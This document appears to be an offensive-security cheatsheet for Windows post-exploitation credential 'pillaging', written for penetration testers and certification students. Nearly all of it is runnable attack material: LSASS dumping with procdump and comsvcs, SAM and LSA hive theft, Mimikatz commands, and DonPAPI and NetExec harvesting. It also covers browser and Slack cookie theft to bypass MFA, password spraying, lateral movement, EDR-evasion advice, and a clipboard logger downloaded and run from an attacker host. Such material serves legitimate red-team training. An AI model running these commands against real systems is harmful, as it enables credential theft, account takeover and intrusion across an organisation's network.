Windows Pillaging
Cheatsheet
Simplified default stack (prefer this over five separate binaries):
donpapi: browsers, CredMan, WiFi, mRemoteNG, RDCMan, VNC, certs, files (remote, one shot)nxcmodules : SAM / LSA / NTDS / DPAPI / spray without leaving Mimikatz on-disklsassyorpypykatz: LSASS without ProcDump → copy → Mimikatz- Fall back to on-box LaZagne / SessionGopher / SharpChrome only when remote collectors fail
Preferred (remote harvest)
# DonPAPI (replaces LaZagne + SessionGopher + SharpChrome for most hosts)
donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors All
donpapi gui # browse loot
# NetExec SAM / LSA / NTDS / DPAPI in one CLI family
nxc smb <TARGET_IP> -u <USER> -p '<PASS>' --sam
# optional (tags)
--lsa
--ntds
-M dpapi
-M browser 2>/dev/null || true
# LSASS without dropping Mimikatz on the target
lsassy -u <USER> -p '<PASS>' -d <DOMAIN> <TARGET_IP>
# Or parse a dump / hive offline
pypykatz lsa minidump lsass.dmp
pypykatz registry --sam SAM.SAV SYSTEM.SAV
# Offline browser profiles copied off-host (Firefox/Chrome/Edge)
HackBrowserData -b all -f <PROFILE_DIR> -o ./browser_lootOn-box fallbacks (when remote ops are blocked)
:: Confirm elevated access before assuming files are missing
whoami /all
net localgroup Administrators
:: Local account hashes (admin/SYSTEM)
reg save HKLM\SAM C:\Users\Public\SAM.SAV
reg save HKLM\SYSTEM C:\Users\Public\SYSTEM.SAV
reg save HKLM\SECURITY C:\Users\Public\SECURITY.SAV
:: LSASS dump (prefer offline parse with pypykatz)
procdump.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Users\Public\lsass.dmp full
:: Saved sessions / WiFi / Autologon
cmdkey /list
netsh wlan show profiles
netsh wlan show profile name="<SSID>" key=clear
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"# Installed apps (role + vault targets)
$apps = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* ,
HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName, DisplayVersion, InstallLocation
$apps | Where-Object DisplayName | Sort-Object DisplayName -Unique | Format-Table -AutoSize
# PS history for every profile
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -EA SilentlyContinue |
ForEach-Object { "`n=== $($_.FullName) ==="; Get-Content $_.FullName }
# Legacy broad tools (use if DonPAPI unavailable)
.\lazagne.exe all | Tee-Object C:\Users\Public\lazagne.txt
Import-Module .\SessionGopher.ps1; Invoke-SessionGopher -Thorough# Offline hash / dump processing on attack box
impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV -security SECURITY.SAV LOCAL
pypykatz lsa minidump lsass.dmp
# Mimikatz only if pypykatz/lsassy miss something you need
# sekurlsa::minidump lsass.dmp ; sekurlsa::logonpasswordsPillaging touches LSASS, SAM, every user’s browser DPAPI blobs, and Credential Manager. Expect EID 4688, Sysmon 10 (process access), and DPAPI events. DonPAPI RemoteOps and LSASS access are especially loud stage once, capture once, avoid looping dir /s C:\ on a monitored host. Use donpapi --no-remoteops when EDR kills remote registry but file collectors still matter.
Phase 0: Orientation
Questions to ask
- Who am I now, and does my token actually let me read SAM, other users’ profiles, and LSASS?
- What role is this host (workstation, file server, jump box, SQL, backup, DC), and what data does that role imply?
- What is watching me Defender, EDR, Credential Guard / LSA protection and what is the OPSEC cost of an LSASS dump?
- What can this foothold reach that my attack box cannot (internal subnets, admin shares, dual-homed routes)?
- Which credential or session, if found here, most cheaply unlocks the next host?
:: Confirm elevation, role, watchers, reach
whoami /all
hostname & systeminfo
ipconfig /all & route print & arp -a
netstat -ano
tasklist /fi "imagename eq MsMpEng.exe"
tasklist /fi "imagename eq lsass.exe"- Confirm identity and elevation (
whoami /groupsshows Administrators or SYSTEM. Testreg save HKLM\SAM). - Fingerprint host role from hostname, installed software, and listening services.
- Note Defender/EDR and whether LSASS is PPL / Credential Guard before dumping.
- Map dual-homed interfaces, routes, ARP, and admin-share reachability.
- Decide first harvest target (local hashes vs domain cache vs app vault) from the host role.
Phase 1: Harvest OS Credentials
Questions to ask
- Which OS stores are newly readable SAM/SECURITY, LSASS, LSA secrets, DPAPI, CredMan?
- Are domain cached logons present, and is offline cracking worth the time versus spraying a plaintext I already hold?
- Do Autologon,
cmdkey, WiFi, or PuTTY proxy keys give me an immediate second identity? - Has every secret been queued for reuse against WinRM, RDP, SMB, MSSQL, and other hosts in Phase 4?
# Prefer remote first no binary left on target
nxc smb <TARGET_IP> -u <USER> -p '<PASS>' --sam --lsa
lsassy -u <USER> -p '<PASS>' -d <DOMAIN> <TARGET_IP>
donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors CredMan,Vaults,Wifi,Certificates:: On-box hive dumps if nxc/DonPAPI remote ops fail
reg save HKLM\SAM C:\Users\Public\SAM.SAV
reg save HKLM\SYSTEM C:\Users\Public\SYSTEM.SAV
reg save HKLM\SECURITY C:\Users\Public\SECURITY.SAV
:: LSASS dump then parse with pypykatz offline (avoid Mimikatz on-box)
tasklist /fi "imagename eq lsass.exe"
procdump.exe -accepteula -ma lsass.exe C:\Users\Public\lsass.dmp
:: Built-in credential surfaces
cmdkey /list
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
netsh wlan show profiles# Offline parse
impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV -security SECURITY.SAV LOCAL
pypykatz lsa minidump lsass.dmp:: Mimikatz (elevated) last resort when lsassy/pypykatz miss material
privilege::debug
token::elevate
sekurlsa::logonpasswords
lsadump::sam
lsadump::secrets
lsadump::cache
sekurlsa::dpapi- Prefer
nxc --sam/--lsa+lsassyfrom the attack box before dropping dump tools. - Save SAM/SYSTEM/SECURITY on-box only if remote collectors fail. Extract with secretsdump/pypykatz.
- Dump LSASS only when needed. Parse with
pypykatz/lsassyoffline Mimikatz on-box is last resort. - Pull LSA secrets and cached domain hashes. Note service-account passwords in secrets.
- Enumerate
cmdkey /listand testrunas /savecred/ RDP reuse where applicable. - Read Autologon (
DefaultUserName/DefaultPassword), WiFi PSKs, VNC registry keys (DonPAPI Wifi/VNC collectors cover this remotely). - Record every plaintext, NTLM, and ticket material with source path for Phase 4 spray and the report.
Phase 2: Application, Browser & Session Secrets
Questions to ask
- Which remote-access / vault apps are installed (mRemoteNG, KeePass, WinSCP, PuTTY, RDP, VPN)?
- Can I decrypt browser logins/cookies as this user, or do I need the user’s DPAPI context?
- Does a
.kdbx,confCons.xml, or SessionGopher hit unlock jump hosts or network gear? - Can Slack/Teams cookies or MailSniper hits yield MFA-bypass session access?
- Should I monitor the clipboard for password-manager paste events before moving on?
# One-shot app + browser + session harvest (preferred)
donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> \
--collectors Chromium,Firefox,MRemoteNG,MobaXterm,RDCMan,CredMan,Vaults,Wifi,VNC,Files,Certificates
# Unlock many users' DPAPI with the domain backup key when you have DA-equivalent
donpapi collect -t <TARGETS> -u <USER> -p '<PASS>' -d <DOMAIN> --fetch-pvk# Inventory apps that store connection secrets (manual confirm)
dir "C:\Program Files","C:\Program Files (x86)" | findstr /i "mRemote KeePass WinSCP OpenVPN TeamViewer FileZilla"
# mRemoteNG default master password is often still mR3m
dir C:\Users\*\AppData\Roaming\mRemoteNG\confCons.xml
# Fallback session tooling if DonPAPI unavailable
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Thorough
.\lazagne.exe browsers sysadmin windows wifi all
.\SharpChrome.exe logins /unprotect# Browser profiles copied off-host → HackBrowserData (logins + cookies)
HackBrowserData -b chrome -f ./ChromeUserData -o ./chrome_out
HackBrowserData -b firefox -f ./FirefoxProfile -o ./ff_out
# KeePass offline
keepass2john <FILE>.kdbx > keepass.hash
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt
# mRemoteNG password attribute (default master pw mR3m if unset)
python3 mremoteng_decrypt.py -s "<Password_attribute>"
python3 mremoteng_decrypt.py -s "<Password_attribute>" -p <MASTER>- Run DonPAPI first for browsers, mRemoteNG, RDCMan, CredMan, WiFi, VNC, certs one collector pass.
- If domain admin path exists,
--fetch-pvkso masterkeys decrypt across hosts/users. - List installed software. Manually confirm vault/RDP/SSH clients DonPAPI might miss (KeePass
.kdbx). - Fall back to SessionGopher + LaZagne + SharpChrome only when remote collectors fail.
- Offline: HackBrowserData on copied profiles for logins/cookies (Slack
d, etc.). Impersonate in a controlled browser. - Find
.kdbx/ password-manager DBs. Crack offline. Inventory vault contents for high-value targets. - Search mail (MailSniper) for pass/creds if Exchange mailbox is in scope.
- Optionally start clipboard logger on interactive admin sessions (
Invoke-ClipboardLogger). - Queue every recovered app password for reuse before Phase 3 file sweeps.
Phase 3: Files, Backups & Sensitive Data
Questions to ask
- Which user desktops/documents, shares, and
ProgramDatapaths hold PII, creds, or IP? - Are there
.vmdk/.vhdx/restic/backup repos I can mount or restore for SAM/NTDS/web roots? - Do IIS/
web.config, unattend, sticky notes, or scripts leak connection strings? - Which artifacts prove impact for the report versus which only feed further access?
- Dump everything now (loud) or selectively collect (quiet)?
:: High-yield file hunt (scope paths void blind C:\ recursion on EDR hosts)
dir /s /b C:\Users\*.txt C:\Users\*.csv C:\Users\*.xlsx C:\Users\*.kdbx C:\Users\*.rdp 2>nul
dir /s /b C:\inetpub\wwwroot\web.config C:\Windows\Panther\Unattend.xml 2>nul
dir /s /b C:\*.vhd C:\*.vhdx C:\*.vmdk C:\*.bak 2>nul
findstr /SIM /C:"password" C:\Users\*\Documents\*.txt C:\Users\*\Desktop\*.txt C:\inetpub\*.config 2>nul# Sticky Notes DB
dir C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_*\LocalState\plum.sqlite
# restic repos look for snapshots dirs / RESTIC_PASSWORD in env/scripts
Get-ChildItem -Recurse -Directory -Filter snapshots -Path C:\,E:\ -EA SilentlyContinue | Select-Object FullName
restic.exe -r <REPO> snapshots
restic.exe -r <REPO> restore <ID> --target C:\Users\Public\restore# Mount disk images offline, then secretsdump
guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
impacket-secretsdump -sam SAM -system SYSTEM LOCAL- Sweep Desktop/Documents/Downloads for notes, spreadsheets,
.kdbx,.rdp, scripts. - Pull IIS/
web.config, unattend/sysprep leftovers, sticky-notes DB, PowerShell transcripts. - Locate backup products (restic, Veeam, vendor agents). List snapshots. Restore high-value hosts/paths.
- Mount
.vmdk/.vhdxbackups → extract SAM/SYSTEM (and NTDS if DC image). - Collect impact evidence (PII, financial, source) with provenance
Phase 4: Network Recon & Lateral Targets
Questions to ask
- What other hosts does this box already know (ARP, RDP history, PuTTY/WinSCP sessions, mRemoteNG nodes)?
- Which internal services and shares are reachable from here that my attack box cannot hit?
- Which harvested credential maps to which discovered host what is the most likely reuse pair?
- Do I need a pivot for a newly discovered subnet?
- What spray order avoids lockouts?
:: Who does this host already talk to?
arp -a
route print
netstat -ano
net view /domain
net group "Domain Admins" /domain# Session / RDP breadcrumbs
cmdkey /list
dir C:\Users\*\AppData\Local\Microsoft\Terminal Server Client\Cache -EA SilentlyContinue
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# From mRemoteNG / SessionGopher output build host:user:pass table# Spray + dump next hosts in the same toolkit (confirm lockout policy first)
nxc smb <CIDR> -u <USER> -p '<PASS>' --continue-on-success
# On each new admin hit harvest immediately, don't context-switch tools
nxc smb <TARGET_IP> -u <USER> -H <NTHASH> --sam --lsa
lsassy -u <USER> -H <NTHASH> -d <DOMAIN> <TARGET_IP>
donpapi collect -t <TARGET_IP> -u <USER> -H <NTHASH> -d <DOMAIN> --collectors All
impacket-psexec <DOMAIN>/<USER>:'<PASS>'@<TARGET_IP>
evil-winrm -i <TARGET_IP> -u <USER> -p '<PASS>'- Build a target list from ARP, routes, DNS suffix, domain groups, and saved-session hostnames.
- Enumerate reachable admin shares and internal services from this vantage point.
- Pair each harvested credential/hash with candidate hosts before testing.
- Stand up a pivot if a new subnet is only reachable from here.
- Confirm lockout policy, then reuse with
nxcon each win, immediately--sam/--lsa+ DonPAPI/lsassy before moving on.
Phase 5: Automated Sweep & Evidence
Questions to ask
- Did DonPAPI/
nxcmiss anything an on-box WinPEAS/Seatbelt/LaZagne pass would catch? - Does tool output corroborate or contradict my manual findings?
- Have I captured tool logs and dumps as evidence rather than relying on scrollback?
- Is persistence or cleanup required before I move to the next host?
# Prefer finishing remote collectors + GUI review before more on-box noise
donpapi collect -t <TARGET_IP> -u <USER> -p '<PASS>' -d <DOMAIN> --collectors All
donpapi gui:: On-box gap-fill save logs
.\winPEASx64.exe cmd quiet > C:\Users\Public\winpeas_admin.txt
.\Seatbelt.exe -group=all > C:\Users\Public\seatbelt.txt
.\lazagne.exe all > C:\Users\Public\lazagne.txt- Complete DonPAPI +
nxc/lsassyfirst. Reviewdonpapi guiloot. - Re-run on-box WinPEAS/Seatbelt/LaZagne only to gap-fill. Diff against remote findings.
- Manually validate every high-value automated hit.
- Archive dumps, histories, configs, and tool logs with timestamps and source paths.
- Decide persistence/cleanup. Remove dropped binaries and open shares used for exfil when RoE requires it.
Reference
What pillaging buys you
With Administrator/SYSTEM you can read every credential store on the box. The point is not “having admin” it is converting that into access elsewhere and reportable impact.
- Extract local/domain hashes and plaintext for reuse and cracking.
- Recover browser, RDP, SSH, VPN, and password-manager secrets for pivoting.
- Mount or restore backups to reach data not present on the live disk.
- Identify and reach other systems on the internal network.
- Gather concrete evidence (paths, dumps, screenshots) for the report.
Credential reuse is the highest-yield move in pillaging. Helpdesk and IT passwords from DonPAPI/LaZagne, mRemoteNG, or Autologon frequently work on servers, databases, and network devices. Try every secret everywhere before falling back to long cracking jobs.
Complexity reducers (use these first)
| Tool | Replaces | When |
|---|---|---|
| DonPAPI | LaZagne + SessionGopher + SharpChrome + much manual DPAPI | Admin/creds over SMB. --fetch-pvk for domain DPAPI |
NetExec (nxc) | Separate dump + spray scripts | --sam / --lsa / --ntds / modules, then spray same CLI |
| lsassy | ProcDump → copy → Mimikatz | Remote LSASS parse. No Mimikatz on target |
| pypykatz | Mimikatz offline for dumps/hives | lsa minidump, registry SAM parse on attack box |
| HackBrowserData | SharpChromium + Firefox SQLite + Cookie-Editor | Offline profile folder → logins + cookies |
# DonPAPI quick reference
donpapi collect -t 10.10.10.0/24 -u admin -p 'Pass' -d CORP --collectors All --fetch-pvk
donpapi collect -t 10.10.10.50 -u admin -p 'Pass' -d CORP --no-remoteops # quieter / EDR dodge
donpapi gui
# lsassy variants
lsassy -u admin -p 'Pass' -d CORP 10.10.10.50
lsassy -u admin -H <NTHASH> -d CORP 10.10.10.50OS credential stores
| Store | How to collect | Offline parse |
|---|---|---|
| SAM/SYSTEM/SECURITY | nxc --sam or reg save HKLM\... | impacket-secretsdump / pypykatz registry |
| LSASS | lsassy (preferred) or ProcDump / comsvcs | pypykatz lsa minidump / Mimikatz |
| LSA secrets | nxc --lsa / Mimikatz lsadump::secrets | Service account passwords |
| Domain cached logons | lsadump::cache / lsassy output | Crack MSCASH2 / reuse if plaintext appears elsewhere |
| CredMan / DPAPI | DonPAPI / SharpDPAPI / LaZagne | Domain PVK via donpapi --fetch-pvk unlocks many users |
| Autologon | Winlogon registry / DonPAPI Files | Cleartext if misconfigured |
| WiFi | DonPAPI Wifi collector or netsh ... key=clear | PSK reuse on corp/guest SSIDs |
:: comsvcs MiniDump (no ProcDump binary)
:: Replace <PID> with lsass PID from tasklist
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Users\Public\lsass.dmp fullApplication credential locations
| Application | Path / artifact | Notes |
|---|---|---|
| mRemoteNG | %APPDATA%\mRemoteNG\confCons.xml | Default master password mR3m if unset |
| KeePass | *.kdbx | hashcat -m 13400 |
| WinSCP / FileZilla / PuTTY / RDP | DonPAPI / SessionGopher / LaZagne | PuTTY proxy password often cleartext in session key |
| Chrome / Edge | Login Data + Local State (DPAPI) | DonPAPI Chromium / HackBrowserData offline / SharpChrome |
| Firefox | %APPDATA%\Mozilla\Firefox\Profiles\*.default-release\ | DonPAPI Firefox / HackBrowserData / cookies.sqlite |
| Slack | Cookie d (.slack.com) | Session steal → search chats for creds |
| Sticky Notes | ...\MicrosoftStickyNotes_*\LocalState\plum.sqlite | Query Note.Text or strings |
| IIS | C:\inetpub\wwwroot\web.config | Connection strings |
| Unattend | C:\Windows\Panther\, sysprep paths | Plaintext/base64 local admin |
mRemoteNG decrypt workflow
# 1) Pull confCons.xml from user profile
# 2) Copy Node Password= attribute
python3 mremoteng_decrypt.py -s "<cipher>" # tries default mR3m
python3 mremoteng_decrypt.py -s "<cipher>" -p <MASTER>
# Crack unknown master against a small list
for p in $(cat /usr/share/seclists/Passwords/Common-Credentials/best110.txt); do
python3 mremoteng_decrypt.py -s "<cipher>" -p "$p" 2>/dev/null && echo "HIT $p"
doneBrowser cookies (Slack example)
# Firefox: copy DB off-host, extract cookie d
copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .python3 cookieextractor.py --dbpath ./cookies.sqlite --host slack --cookie d
# Import value into Cookie-Editor on slack.com, refresh, Launch Slack, search "pass|creds"# Chromium cookies DPAPI-encrypted; decrypt as the user
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" `
"$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Invoke-SharpChromium -Command "cookies slack.com"Backup abuse patterns
| Backup type | Attacker move |
|---|---|
.vmdk / .vhdx / .vhd | Mount offline → SAM/SYSTEM (or NTDS) → secretsdump |
| restic repository | Find repo + password (RESTIC_PASSWORD / scripts) → snapshots → restore |
| Vendor backup console (Veeam, etc.) | Admin on backup server ≈ admin on backed-up estate |
| File-share “backups” folders | Hunt for archived configs, VPN profiles, old web roots |
# restic password via env or prompt
$env:RESTIC_PASSWORD = '<PASS>'
restic.exe -r E:\restic\ snapshots
restic.exe -r E:\restic\ restore <SNAPSHOT_ID> --target C:\Users\Public\restore
# Prefer Windows paths inside restore: C:\Users\Public\restore\C\...Clipboard monitoring
IEX(New-Object Net.WebClient).DownloadString('http://<LHOST>/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger
# Wait for password-manager paste / Azure portal loginsUseful when admins never type passwords (Ctrl+C from KeePass/CyberArk). Leave running only while interactive use is likely. It is persistent noise if forgotten.
Common Mistakes
- Treating access-denied on SAM/LSASS as “nothing here” verify elevation first.
- Running LaZagne + SessionGopher + SharpChrome + Mimikatz separately when DonPAPI + lsassy + nxc would have covered it in three commands.
- Cracking NTLM/MSCASH for hours before spraying plaintexts from Autologon, DonPAPI, or mRemoteNG.
- Dumping LSASS on Credential Guard / PPL hosts without a fallback plan, burning the foothold to EDR.
- Ignoring installed remote-access apps (mRemoteNG, WinSCP, KeePass) and only running Mimikatz.
- Restoring entire backup sets to disk instead of targeting SAM/web.config/SSH keys.
- Pasting fabricated example credentials into the report instead of real, sourced findings.
- Skipping cookie/session theft when MFA blocks password reuse into SaaS/IM.
Quiz
You are SYSTEM on a jump box. Program Files shows mRemoteNG. ConfCons.xml decrypts with the default master password. What is the highest-value next move?
Quiz
LSASS dump tools are blocked by EDR, but you have local admin. Which pillaging path still reliably yields lateral creds?
Quiz
You have local admin on five jump hosts and want browser + mRemoteNG + WiFi secrets with minimal tool juggling. Best first move?
Quiz
You stole a Slack cookie d from Firefox cookies.sqlite for an IT user. MFA is enabled on the tenant. What do you do?
#Windows #Pillaging #PostExploitation #RedTeam #PenetrationTesting #CredentialAccess #BrowserSecrets #mRemoteNG #DPAPI #LateralMovement #HTB #OSCP #WindowsInternals